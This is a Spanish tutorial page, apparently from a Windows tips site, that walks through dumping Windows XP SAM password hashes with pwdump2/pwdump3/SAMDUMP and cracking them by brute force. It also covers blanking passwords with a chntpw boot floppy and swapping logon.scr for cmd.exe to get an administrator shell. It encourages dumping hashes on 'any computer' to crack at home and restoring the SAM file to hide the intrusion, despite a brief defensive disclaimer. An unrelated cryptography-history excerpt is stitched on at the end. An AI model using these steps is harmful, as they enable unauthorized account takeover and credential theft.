Después de instalarlo pulsamos el archivo qd.bat, este programa cuando se ejecuta hace un dump, es decir, un volcado. Esto es, coge el nombre de los usuarios configurados y sus claves codificadas y los graba en el archivo \run\pass.txt
¿Pero de donde vuelca o coge a los usuarios y contraseñas?
Pues del archivo: \Windows\System32\Config\SAM
No podrás verlo por las buenas, porque es un archivo de sistema.
Nota:
Realmente lo coge del Registro de Windows, concrétamente de la clave
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Accounts/Users,
pero ha llegado a ésta clave a través del archivo SAM.
SAM = Security Accounts Manager = Gestor de Seguridad de las Cuentas
En pass.txt tenemos ahora el nombre de los usuarios y sus contraseñas codificadas.
Ejemplo de archivo pass.txt, aquí observamos a varios usuarios y sus contraseñas codificadas (hash).
adan:1008:41ae92d9700e86ddaad3b435b51404ee:c4298166e452f1fd52473114aecc11e8:::
eva:1009:ab37122db9fcd7b6aad3b435b51404ee:2fed650dfbef6e8981aaa688fb8f51b1:::
Kilo:1014:7800b69c133545b0aad3b435b51404ee:142663291fd42a3da7c2b96a96331c07::: ping:1010:61649c78245af931aad3b435b51404ee:c60ed5847674036197eaf736de5a9e5a::: pong:1011:494c7970e292f76eaad3b435b51404ee:8231d375b607d9328c07dc7d41fd619b:::
usuario : id : LM pw : NT pw : : :
Esta acción la podemos hacer en cualquier ordenador y luego llevarnos a nuestra casa en un disquete grabado el archivo pass.txt con los usuarios y sus contraseñas codificadas.
En nuestra casa, con tiempo, podemos descodificar las contraseñas.
Ahora comenzamos a descodificar las contraseñas. Para ellos pulsamos el archivo \run\crack.bat
Saldrá el Intérprete de comando y te irá mostrando las contraseñas y los usuarios.
CONTRASEÑAS
(nombre de usuario:1)
PI
(ping:1)
PO
(pong:1)
ELECTRO
(juan:1)
NICA
(juan:2)
Fíjate, la contraseña del usuario juan lo ha detectado en dos tandas: ELECTRONICA
El resultado de la descodificación se guardará en el archivo cracked.txt y john.pot
Si quieres empezar de nuevo borra los archivos pass.txt, cracked.txt y john.pot
Si quieres crackear sólo la contraseña de un usuario, elimina de pass.txt a todos los usuarios menos al que quieres descodificar su contraseña:
Cambio en el archivo pass.txt, hemos borrado a todos los usuarios menos a eva.
eva:1009:ab37122db9fcd7b6aad3b435b51404ee:2fed650dfbef6e8981aaa688fb8f51b1:::
Características:
a) Para aplicarlo tenemos que entrar como Administrador, ya que el Servicio de Seguridad lssass sólo permite que acceda a la clave SAM del Registro al Administrador.
b) Cuanto más larga y rara sea la contraseña, más tiempo tardará en descodificarla, es decir, si el usuario juan tiene de contraseña: RuT,.%-v8Fr.p El programa tardará mucho tiempo en encontrarla, en cambio si su contraseña es: secre la descodificará pronto.
(Puedes dejarlo toda la noche intentando descodificarla, a ver qué pasa...)
c) Presenta la contraseña en mayúsculas (LANMAN PW), y tal vez tengamos que introducirla en minúsculas.
d) El programa descodifica las contraseña mediante la "fuerza bruta", esto es, comienza a poner rapidísimamente combinaciones de letras, números y signos, hasta que encuentra una que coincida con la codificación. Cuanto más rápido sea el ordenador, evidentemente, antes encontrará la contraseña.
2.- Volcado del SAM desde MSDOS SAMDUMP.EXE
1.- En el archivo \Windows\System32\Config\SAM se encuentra las contraseñas de los usuarios.
2.- No podemos acceder al archivo SAM desde XP porque es un archivo protegido.
3.- Pero podemos acceder a SAM mediante un disquete MSDOS y un programa: readntfs, ntfsdos, o LINUX.
Ver Crackear los Permisos de los usuarios NTFS.
4.- Una vez que tengamos el archivo SAM le vamos hacer un volcado para obtener a los usuarios y sus contraseñas codificadas.
(Volcar significa coger los datos del archivo SAM.)
5.- Para ello utilizamos la vieja aplicación SAMDUMP.EXE de Dimitry Andrianov
Bajar SAMDUMP.EXE (68 K)
Recuerda que si aplicas SAMDUMP a un archivo SAM que tenga aplicado el syskey.exe, (que son casi todos los W2000 y XP), los hash obtenidos tienen una doble encriptación que no podrás descodificar con los archivos que te presento en ésta página (es muy difícil de descodificar).
6.- Entramos en Inicio / Ejecutar / cmd y ponemos:
C:\> SAMDUMP SAM
o bien
C:\> SAMDUMP SAM > pass.txt
Suponiendo que tanto la aplicación SAMDUMP.EXE como el archivo SAM se encuentren en C:
7.- En C:\>pass.txt obtendremos a los usuarios y sus contraseñas codificadas.
SYSKEY
Ahora la tentación es pasarle al pass.txt un programa como el crack.exe de John the Ripper, o el L0phtCrack, o el LC4 de @Stake, pero no funcionará porque Microsoft viendo el problema que tienen con el crackeo de sus claves, actualmente somete al archivo SAM a una doble codificación mediante SYSKEY, de manera que no lo podremos crackear de esta manera.
Pero en fin, podemos intentarlo para comprobarlo.
Este programa era bueno hace unos años cuando Microsoft aún no había implantado su SYSKEY.
SYSKEY está en \Windows\System32\syskey.exe
Es un programa "sin vuelta atrás", es decir, una vez configurado no lo podemos reiniciar.
3.- Volcado del SAM desde XP pwdump2
Con pwdump2, http://www.webspan.net/~tas/pwdump2 de Todd A. Sabin, podemos coger los hash de las contraseñas de los usuarios que están en el Registro de Windows:
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Accounts/Users
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Accounts/Names
Nota: Las contraseñas han llegado al Registro de Windows tomadas del archivo SAM en el arranque.
Características:
a) Debes entrar como Administrador.
b) Puedes ejecutarlo desde el Intérprete de comandos de XP.
c) Cuando obtienes los hash, vienen sin el SYSKEY, con lo cuál podrás pasarle un programa como el ntxp2k o LC4 o L0phtCrack y obtener las contraseñas.
1.- Bájate a una carpeta (ejemplo C:\PWDUMP2) y descomprime pwdump2.zip
Bajar pwdump2.zip (50 K)
2.- Entra en el Intérprete de comandos (Inicio/Ejecutar/cmd)
C:\PWDUMP2>pwdump2
Te pide el Identificador de Programa (PID) de lssas
Local Security Authority SubSystem (LSASS)
(Este es el programa que controla la Seguridad del Sistema)
3.- Pulsa las teclas
4.- Observarás que hay una aplicación llamada lssas.exe, coge su PID (Voy a suponer 580)
(Si no ves su PID: Ver/Seleccionar columnas/Identificador de Procesos (PID))
5.- En el Intérprete de comando volvemos a poner:
C:\PWDUMP2>pwdump2 580
6.- Te saldrá en pantalla los usuarios y sus contraseñas hash (Sin SYSKEY)
7.- Si quieres que en vez de presentártelo en pantalla se guarde en un archivo:
C:\PWDUMP2>pwdump2 580 > pass.txt
8.- Ahora puedes coger el archivo pass.txt y pasarlo por el ntxp2k o por LC4 o por L0phtCrack y descodificar sus contraseñas.
El programa visto en el apartado 1.- (ntxp2k) utiliza el programa pwdump2 para coger las contraseñas.
Una de las diferencias entre SAMDUMP.EXE y pwdump2.exe, es que
SAMDUMP.EXE hace un volcado del archivo SAM que previamente hemos copiado con alguna aplicación como por ejemplo readntfs, ntfsdos o LINUX. El archivo SAM en W2000 y XP está dóblemente encriptado mediante SYSKEY, por lo cuál será muy dificil descodificar los hash.
Y pwdump2.exe coge los hash directamente del Registro de Windows. En este sitio los hash NO se encuentran encriptado por SYSKEY, por lo cuál se podrá descodificar los hash mediante fuerza bruta. Para coger el hash del Registro tenemos que ser Administrador.
En el archivo SAM se guardan dos tipos de contraseñas por usuario, la LM Password y la NT Password. La LM es obsoleta, guarda las claves en mayúsculas y es fácil de crackear, la NT guarda las claves como las escribe el usuario y es difícil de crackear.
4.- Volcado del SAM en ordenadores de red pwdump3
Con pwdump3, http://www.ebiz-tech.com/pwdump3 de Phil Staubs, podrás captar los hash de las contraseñas de ordenadores en red.
(Este programa se basa en el pwdump2, aunque está realizado por otro autor)
Características:
a) Debes tener privilegio de Administrador.
b) Debes conocer el IP o el nombre del otro ordenador de red.
1.- Bájate a una carpeta (ejemplo C:\PWDUMP3) y descomprime pwdump3.zip
Bajar pwdump3.zip (87 K)
2.- Entra en el Intérprete de comandos (Inicio/Ejecutar/cmd)
C:\PWDUMP3>pwdump3
Te pide el nombre o IP del ordenador en donde quieres entrar
C:\PWDUMP3>pwdump3 192.168.110.12
3.- Te aparecerá en pantalla.
Si quieres obtenerlos en un archivo:
C:\PWDUMP3>pwdump3 192.168.110.12 pass.txt
5.- Otro método. Muy bueno ;-) Olvidar contraseña chntpw
En este caso vamos a suponer que hemos perdido la contraseña del Administrador del ordenador ( o de cualquier otro usuario) y desde un disquete vamos a crear una nueva contraseña.
(Realmente el programa que vamos utilizar tiene un error y no será capaz de cambiar la contraseña, pero sí será capaz de BORRARLA para que podamos entrar sin contraseña !!! :-)
Para borrar la contraseña NO hace falta ser Administrador.Nota: En versiones posteriores solventarán el error.
Consulta la página del autor: http://home.eunet.no/~pnordahl/ntpasswd/
Para hacer nuestras pruebas vamos a entrar como Administrador en nuestro ordenador y vamos a crear a un usuario llamado: Antonio y con contraseña: perez
Entra con el nombre del usuario Antonio, para comprobar que funciona y para establecer su configuración. Luego cierra la sesión de Antonio.
Vamos a crear un disquete de arranque de LINUX (Muy fácil) y usar aplicación llamada chntpw de Petter Nordhal-Hagen.
1.- Bájate estos dos archivos y guárdalos en una carpeta, por ejemplo: C:\BIN
a.) Bajar bd030225.bin (1,4 M)
b.) Bajar rawrite2.exe (17 K)
(O bájalo de la página del autor: http://home.eunet.no/~pnordahl/ntpasswd)
Mejor desde aquí...
Más fácil todavía... inserta un disquete en la disquetera, pulsa LINUX_chntpw.exe Abrir
Luego vas al paso 4.-
(Habrás creado automáticamete un disquete autoejecutable con el programa en questión)
2.- Introduce un disquete vacío en la disquetera.
3.- Entra en el Intérprete de comandos (Inicio/Ejecutar/cmd), entra en el directorio C:\BIN y ejecuta
C:\BIN> rawrite2.exe
Escribe: bd030225.bin y luego a.
RaWrite 2.0 - Write disk file to raw floppy diskette Enter disk image source file name: bd030225.bin Enter target diskette drive: a
4.- Ya tienes un disquete de arranque, con el programa requerido. El disquete arrancará en el Sistema Operativo LINUX. Será fácil.
5.- Reinicia, entra en la BIOS y cambia la Boot Sequence para que el sistema arranque desde el disquete A:
6.- Te saldrán varios mensajes, pulsa la tecla Entrar.
Press return/enter to continue Enter
Probe for SCSI-drivers: [n] Enter
Aparecerán las particiones que tienes en tus discos duros:
Device Boot Start End Blocks Id System /dev/hda1 * 1 1859 14932386 7 HPFS/NTFS Probable NT partitions: /dev/hda1 * 1 1859 14932386 7 HPFS/NTFS Wnat partition contains your NT installation? [/dev/hda1] : Enter
Fíjate en Windows los discos y particiones se llaman C:, D:, E:, F:, G:
En LINUX se llama hda1, hda2, hda3, hda4, hda5,...
si tienes dos discos duros, el otro sería hdb1, hdb2, hdb3.
hda1
hda2
hda3
hda4
hdb1
hdb2
hdb3
hdb4
7.- Ahora te pedirá en qué directorio se encuentra los archivos de contraseñas, por defecto
(windows/system32/config)
[windows/system32/config] : Enter
8.- Te saldrá un listado con los archivos que se encuentran en ese directorio.
Te pedirá que elijas los que contienen las contraseñas, por defecto (sam system security)
[sam system security] : Enter
9.- Ahora comenzará el programa chntpw a Editar los usuarios configurados:
()========() chntpw Main Interactive Menu ()========() Loaded hives: (sam) (system) (security) 1 - Edit user data and passwords 2 - Syskey status & change - - - 9 - Registry editor, now with full write support! q - Quit (you will be asked if there is something to save) What to do? [1] -> Enter (Pulsa el 1 o Enter)
10.- Aparecerán los usuarios configurados:
RID: 03f2, Username: (Antonio) RID: 03f2, Username: (Administrador) RID: 03f2, Username: (Adan) RID: 03f2, Username: (Eva) RID: 03f2, Username: (Ping) RID: 03f2, Username: (Pong) RID: 03f2, Username: (Invitado), disabled or locked*
11.- Te pedirá que introduzcas el nombre del usuario al cuál le quieres cambiar o borrar la contraseña, en nuestro caso ponemos a Antonio
Select: ! - quit, . - list users, 0x(RID) - User with RID (hex) or simple enter the username to change: [Administrator] Antonio
12.- Aquí el programa comete un error, deberíamos de poderle cambiar la contraseña, pero sólo realiza la función de borrarle la contraseña, para ello introducir el asterisco *
* = blank the password (EXPERIMENTAL! but may fix problems) Enter nothing to leave it unchanged Please enter new password: *
13.- Pulsamos y (yes), pulsamos ! para salir, pulsamos quit (q) para salir del menú, luego pulsamos dos veces y
Do you really wish to change it? (y/n) [n] y
Select: ! - quit, . - list users, 0x(RID) - User with RID (hex)
or simple enter the username to change: [Antonio] !
What to do? [1] -> q
Write hive files? (y/n) [n] : y
About to write file(s) back! Do it? [n] y
Writing sam
14.- Quitamos el disquete y reiniciamos el ordenador. Podemos entrar en la cuenta del usuario Antonio sin tener que ponerle contraseña.
Lo mismo podríamos haber realizado con el Administrador.
Para que no noten que hemos entrado en una cuenta, actuaríamos de esta manera:
1.- Vamos a Crackear los Permisos de los usuarios NTFS y hacemos una copia del archivo \Windows\System32\Config\SAM (256 K) en un disquete.
2.- Mediante el disquete (LINUX, chntpw) le quitamos la contraseña a un usuario: *
Esto cambiará al archivo SAM.
3.- Entramos como ese usuario en XP sin contraseña. ;-)
4.- Volvemos a Crackear los Permisos de los usuarios NTFS, cogemos el archivo SAM que copiamos en el paso 1.- en un disquete y volvemos a poner el original en su sitio: \Windows\System32\Config\SAM
De esta manera todo quedará como al principio, o sea con las contraseñas originales.
Claro que con las versiones gratuita de NTFSREAD o NTFSDOS, no lo podrás hacer, ya que estas versiones sólo admiten copias desde NTFS pero no hacia NTFS. Las versiónes comerciales cuestan 300€.
6.- El Profesional. LC4 de @Stake (Version mejorada de L0phtCrack)
Bajar lc4setup.exe (4 M)
2.- Con este programa podemos importar los hash de la clave SAM del Registro de nuestro ordenador local, o desde un archivo SAM que hubiéramos conseguido, o desde un archivo de texto, ejemplo pass.txt, que tengamos. También se puede obtener a través de la red (sniffer).
3.- Tendrás que ser Administrador para aplicarlo. :-(
4.- En Sessions /Sessions Options... Podemos configurar la manera en que buscará la contraseña:
a) Un diccionario con 250.000 palabras en inglés. (Estoy preparando uno en Español)
b) Híbrido, combinaciones de signos y palabras del diccionario anterior.
c) Fuerza bruta.
5.- Para utilizarlo:
a) File / New Session...
b) Import / Import From Local Machine
c) Session / Beguin Audit (F4)
En Sessions / Sessions Options... se configura la forma en que busca las contraseñas.
Aquí nos encontramos de nuevo, como en el apartado 2.- (Volcado de SAM), que si obtenemos un archivo SAM por otros métodos (LINUX, READNTFS, NTFSDOS), no podemos descodificar su volcado.
Porque a partir de la versión NT 4 (Service Pack 3), Windows 2000 y Windows XP tienen las contraseñas doblemente protegidas por un sistema llamado SYSKEY, de tal manera que aunque obtengamos el volcado de los hash contenidos en SAM, no podremos descodificarlo.
SYSKEY es una utilidad que tiene Windows para proteger doblemente las contraseñas del SAM.
7.- Cain & Abel ---->>>>>> - Es importante que lo Estudies - <<<<<<----
Otra aplicación muy buena para la búsqueda de contraseñas es Cain & Abel.
Es una aplicación clásica muy conocida, se utilizaba en Windows 98 y ahora en XP.
Es parecida a LC4, pero es gratuita.
Vale para ordenador local y para red.
Es importante que le eches un vistazo porque te va a gustar.
No estoy seguro, pero creo que la puedes hacer funcionar como usuario limitado (!?)
¿Puede encontar la claves de hotmail, yahoo, etc... que tienen la cookies de tu ordenador local?
En fin tienes que probarlo... Cain & Abel v2.5 beta32 for Windows NT/2000/XP
Bajar Cain: http://www.oxid.it/cain.html (2,33M) (Gratuito)
8.- Otro intento... No llega a funcionar completamente :;-(
En http://www.cgsecurity.org Grenier Christophe ha realizado modificaciones en programas como los vistos anteriormente.
En este caso se arranca desde un disquete MSDOS (no desde un disquete LINUX como anteriormente)(Aunque luego trabaja con códigos de LINUX)
NTFS Driver - March 30,2001 - GNU General Public License Original version by Martin von Lewis and Regis Duchesne for the Linux Kernel The original version avaible at http://www.informatik.hu-berlin.de/~loewis/ntfs/ DOS version and some small modifications by Christophe GRENIER Last version is avaible at http://www.cgsecurity.org
Yo lo he intentado aplicarlas en XP, pero no ha salido exitoso.
Tendrás que hacer un disquete de inicio MS-DOS.
Bajarte el archivo ntfs.zip (599 K) que se encuentra en la dirección anterior.
Copiar en el disquete los archivos que se encuentran en la carpeta BIN.
La aplicación ntcp copia archivos de NTFS a FAT
La aplicación chntpw cambia o borra la contraseña
La aplicación ntchange copia un archivo de FAT a NTFS. (suele fallar)
La aplicación samdump extrae los códigos hash del archivo sam.
Para copiar un archivo puedes poner:
ntcp ///windows/system32/config/sam sam o bien
ntcp //hda1/windows/system32/config/sam sam
Para cambiarle la contraseña a sam
chntpw -i sam
Para copiar un archivo a NTFS
ntchange sam ///windows/system32/config/sam o bien
ntchange sam //hda1/windows/system32/config/sam
Para extraer el password de sam (dichoso SYSKEY... )
samdump sam
9.- En el Registro de Windows.
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Accounts/Users
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Accounts/Names
Si como Administrador el Sistema no te deja ver las claves anteriores, configura los Permisos de éstas para que sean acesibles al Administrador.(Botón derecho sobre SAM/Permisos.../Agregar Administradores)
10.- Otros. Windows 98 .PWL
Si queremos descodificar las contraseñas que se encuentran en los archivos de: \Windows 98
/Windows/*.PWL vamos al programa Cain. (7.- Cain & Abel)
Ficha: Cracker. Panel izquierdo: PWL files
Botón derecho en las líneas del Panel derecho: Add to list
Añadir al usario que se encuentra en: \WINDOWS\PEDRO.PWL
Botón derecho sobre C:\WINDOWS\PEDRO.PWL: Try another username Poner: PEDRO
Botón derecho sobre C:\WINDOWS\PEDRO.PWL | PEDRO: Start Brute-Force Attack
- Puedes configurar la Fuerza-Bruta: Configure/Brute-Force Options
Ver Codificar y Descodificar archivos con el Winzip
El objetivo de esta página es dar a conocer distintos métodos de crackeo o intento de crakeo a un ordenador XP, para hacer ver al lector que debe proteger su equipo con una contraseña de dificil descodificación.
Estas aplicaciones que estamos viendo les sirven al Administrador para ver el grado de dificultad que utilizan en sus contraseñas los usuarios de su sistema.
También puede ocurrir que un usuario del ordenador tenga sus archivos encriptado mediante EFS, y que en algún momento ese usuario se vaya de su empresa sin comunicar su clave de acceso. En éste caso el Administrador descodificaría la clave del usuario mediante las aplicaciones vistas anteriormente y entraría en el sistema con esa clave que a la vez le permitirá ver los archivos codificados mediante EFS.
Nota: Debes tener cuidado con el uso de estos programas, ya que estás utilizando archivos críticos del sistema como el SAM. Si falla algo o bloqueas el ordenador correrá bajo tu responsabilidad.
Recopilación de hash con distintas utilidades (Resumen).
Tenemos a un usuario llamado Javier, (id = 1026), que tiene como contraseña javi.
Vamos a ver cómo capta su hash las distintas aplicaciones.
ntxp2k y pwdump2 van al Registro de Windows, toman la información y saca los hash:
Nombre de usuario: id : hash LM PW : hash NT PW : : :
Javier:1026:0a12bea5de05e13daad3b435b51404ee:2258294cd69259175bfe860f7a2a7992:::
SAMDUMP.EXE toma los hash de un archivo que hayamos copiado anteriormente de SAM con NTFSDOS, READNTFS o LINUX.
hash LM PW 75 D1 B1 1A AA 31 53 41 2C 80 5D CA 00 7E 25 8C
hash NT PW 5F E0 E4 3A C5 DC D1 27 C7 83 52 6E C9 36 06 80
chntpw toma los hash directamente del archivo SAM mediante LINUX.
Crypted NT pw 01 00 01 00 2c b1 65 b9 54 5c 5e f4 45 a9 a0 00
Crypted LM pw 01 00 01 00 9b 2c 1d e2 4f 68 17 99 f4 6c e9 f2
MD4 hash fa 30 ff 68 22 f2 95 e9 62 35 98 2a b3 11 43 0e
Lanman hash 75 d1 b1 1a aa 31 53 41 2c 80 5d ca 00 7e 25 8c
En el Registro de Windows, el Administrador también puede ver los hash.
Inicio / Ejecutar / regedit
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Accounts/Users
No puedo entrar en Mis documentos después de haber instalado XP
Suele ocurrir lo siguiente, un usuario tiene ciertas carpetas en su ordenador, Mis documentos, Mi Música, ... copia esos archivos en otra partición, reinstala XP, le pone el mismo nombre de usuario y contraseña que tenía anteriormente y cuando quiere acceder a las carpetas que copió en esa otra partición, le sale un mensaje de acceso denegado.
Microsoft recomienda éste proceso para poder volver a acceder a esas carpetas: hacerse propietarios de la mismas.
Viene a decir...
Entra con una cuenta de Administrador.
Botón derecho sobre la carpeta / Propiedades / Seguridad* / Opciones avanzadas
ficha Propietario / En Nombre poner Administradores
Marcar: Reemplazar propietario en subcontenedores y objetos.
(Si quieres cambiarlos: Permisos / Nombre Administradores / Modificar los permisos.)
* Si no vemos Seguridad vamos a Herramienta/Opciones de Carpeta ../Ver/Desmarcamos "Utilizar uso compartido simple de archivos"
Ver Permisos
Nota: Si las carpetas estaban encriptada mediante EFS, la recuperación de los datos será muy complicada:
EFS
Otra forma de cambiar la contraseña del Administrador
(o al menos intentarlo)
Consiste en cambiar el protector de pantalla logon.scr por el intérprete de comando.
Es decir, vas a: Inicio/Ejecutar/logon.scr y saldrá el Protector de pantalla de XP
Si pones Inicio/Ejecutar/cmd saldrá el intérprete de comandos,
el truco consiste en eliminar el logon.scr y renombrar al cmd.exe como logon.scr
Fíjate, si arrancas el ordenador entrará la pantalla de bienvenida con los usuarios creados. Si durante unos 10 minutos no se pulsa ninguna tecla ni se mueve el ratón, saltará automáticamente el Protector de pantalla logon.scr.
Si, como he comentado anteriormente, eliminamos logon.scr y ponemos a cmd.exe como logon.scr, saltará el Intérprete de comandos (cmd.exe) como Protector de pantalla. De tal manera que accedemos al Intérprete de comandos con privilegios de Administrador. En este caso podemos cambiar las contraseñas de los usuarios, incluyendo el Administrador con la orden:
net user nombre clave
En efecto, net user nombre clave se utiliza para cambiar la contraseña de un usuario, pero ésta opción sólo la puede realizar un Administrador del sistema.
Lo probamos:
* Entra como Administrador, ve al Intérprete de comandos (cmd.exe) y escribe:
net user juan 123 (Suponemos que hay un usuario llamado juan)
Le hemos cambiado la contraseña al usuario juan. Lo puedes comprobar.
* Ahora entra como un usuario limitado, ve al Intérprete de comandos (cmd.exe) y escribe:
net user juan 456
Comprobará que no admite el cambio.
Así que según entremos como Administrador o como usuario limitado podremos o no cambiar la contraseña de los demás. Por eso intentamos poner el cmd.exe como Protector de pantalla (logon.scr), porque cuando salta en el inicio lo hace con privilegio de Admininistrador, como he comentado anteriormente.
Si tanto como Administrador o como usuario limitado escribes: net user, saldrán los usuarios del sistema, prueba también poner net user Administrador, saldrá algunos de sus parámetros.
En algunos sitios proponen el sistema siguiente para poder cambiar las contraseñas, pero nos encontraremos con que el usuario limitado no puede borrar ni cambiar los archivos de la carpeta WINDOWS\system32\, así que no se puede hacer mediante el siguiente sistema:
1.- Entramos como usuario limitado.
2.- Hacemos copias de Seguridad de logon.scr y cmd.exe, borramos logon.scr y renombramos cmd.exe como logon.scr
> C:
C:\> cd windows\system32
C:\WINDOWS\system32> mkdir Segur
C:\WINDOWS\system32> copy logon.scr Segur\logon.scr
C:\WINDOWS\system32> copy cmd.exe Segur\cmd.exe
C:\WINDOWS\system32> del logon.scr
C:\WINDOWS\system32> rename cmd.exe logon.scr
C:\WINDOWS\system32> exit
3.- Ahora vas al Escritorio, botón derecho del ratón.Propiedades. Protector de pantalla y pones a Windows XP como tal. Le pones 1 minuto como tiempo de Espera.
3B.- Arranca el ordenador y no toques ninguna tecla. Al cabo de unos 15 minutos saldrá el Protector de Pantalla del Administrador, que será el Intérprete de comandos con permisos de Administrador.
4.- Arranca el ordenador, entra en tu cuenta, espera que salte el Protector de pantalla que será el intérprete de comandos (cmd)
5.- Cuando salte el Protector de pantalla con el intérprete de comandos, escribe:
C:\> net user Administrador miclave
o bien
C:\ net user Juan miclave
Suponemos, en este caso, que conocemos el nombre de la cuenta del Administrador y que es Juan.
Nota: Debemos tener cuidado con los Protectores de pantallas que nos regalan algunas páginas web o algunos correos, ya que son programas ejecutables (.scr) y en su interior puede haber un programa de tipo troyano o algún otro tipo de virus que nos puede dañar el sistema.
Ejemplo: protectorpantalla.scr (330 KB)
Otra forma de cambiar el Protector de pantalla de la pantalla de bienvenida es ir a la clave del Registro:
HKEY_USERS / .DEFAULT / Control Panel / Desktop
y cambiar el Dato de SCRNSAVE.EXE
También podemos cambiar el tiempo de espera: ScreenSaveTimeOu
Via trucos xp
Principal sistema criptográfico de finales de siglo
Desde el siglo XIX y hasta la Segunda Guerra Mundial, las figuras más importantes fueron la del holandés Auguste Kerckhoffs y la del prusiano Friedrich Kasiski. Pero es en el siglo XX cuando la historia de la criptografía vuelve a experimentar importantes avances. En especial durante las dos contiendas bélicas que marcaron al siglo: la Gran Guerra y la Segunda Guerra Mundial. A partir del siglo XX, la criptografía usa una nueva herramienta que permitirá conseguir mejores y más seguras cifras: las máquinas de cálculo. La más conocida de las máquinas de cifrado posiblemente sea la máquina alemana Enigma: una máquina de rotores que automatizaba considerablemente los cálculos que era necesario realizar para las operaciones de cifrado y descifrado de mensajes. Para vencer al ingenio alemán, fue necesario el concurso de los mejores matemáticos de la época y un gran esfuerzo computacional. No en vano, los mayores avances tanto en el campo de la criptografía como en el del criptoanálisis no empezaron hasta entonces.
Tras la conclusión de la Segunda Guerra Mundial, la criptografía tiene un desarrollo teórico importante, siendo Claude Shannon y sus investigaciones sobre teoría de la información esenciales hitos en dicho desarrollo. Además, los avances en computación automática suponen tanto una amenaza para los sistemas existentes como una oportunidad para el desarrollo de nuevos sistemas. A mediados de los años 70, el Departamento de Normas y Estándares norteamericano publica el primer diseño lógico de un cifrador que estaría llamado a ser el principal sistema criptográfico de finales de siglo: el Estándar de Cifrado de Datos o DES. En esas mismas fechas ya se empezaba a gestar lo que sería la, hasta ahora, última revolución de la criptografía teórica y práctica: los sistemas asimétricos. Estos sistemas supusieron un salto cualitativo importante, ya que permitieron introducir la criptografía en otros campos que hoy día son esenciales, como el de la firma digital.
Via wikipedia